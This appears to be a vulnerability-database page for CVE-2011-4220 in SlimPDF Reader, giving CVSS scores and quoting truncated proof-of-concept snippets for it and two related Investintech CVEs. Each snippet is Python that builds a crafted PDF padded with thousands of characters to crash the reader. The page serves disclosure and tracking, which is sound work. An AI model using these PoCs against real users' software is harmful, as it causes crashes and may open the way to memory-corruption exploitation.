Published: 01/11/2011 Updated: 07/03/2012

CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6

VMScore: 945

Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Investintech.com SlimPDF Reader does not properly restrict the arguments to unspecified function calls, which allows remote malicious users to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document.

Vulnerable Product	Search on Vulmon	Subscribe to Product
investintech slimpdf reader -

Slim PDF Reader version 10 suffers from a denial of service vulnerability ...

# Exploit Title: Able2Doc and Able2Doc Professional v 60 memory corruption # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: wwwinvestintechcom # Version:60 # Tested on: Windows 7 # CVE : cve-2011-4221 payload ="B"*13000 crash="startxref" pdf=payload+crash filename = "slimpdPoCpdf" file = open(filename, ...

# Exploit Title: Able2Extract and Able2Extract Server v 60 Memory Corruption # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: wwwinvestintechcom # Version:60 # Tested on: Windows 7 # CVE : cve-2011-4222 payload ="A"*12000 crash="startxref" pdf=payload+crash filename = "slimpdPoCpdf" file = open(filenam ...

# Exploit Title: # Date: June 24 2012 # Exploit Author: Carlos Mario Penagos Hollmann # Vendor Homepage: wwwinvestintechcom # Version:10 # Tested on: Windows 7 # CVE : cve-2011-4220 payload ="A"*10000 crash="startxref" pdf=payload+crash filename = "slimpdPoCpdf" file = open(filename,"w") filewritelines(pdf) fileclose() ...

CWE-264 http://www.kb.cert.org/vuls/id/275036 https://nvd.nist.gov https://packetstormsecurity.com/files/114161/Slim-PDF-Reader-1.0-Memory-Corruption.html https://www.exploit-db.com/exploits/19393/

CVE-2011-4220

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect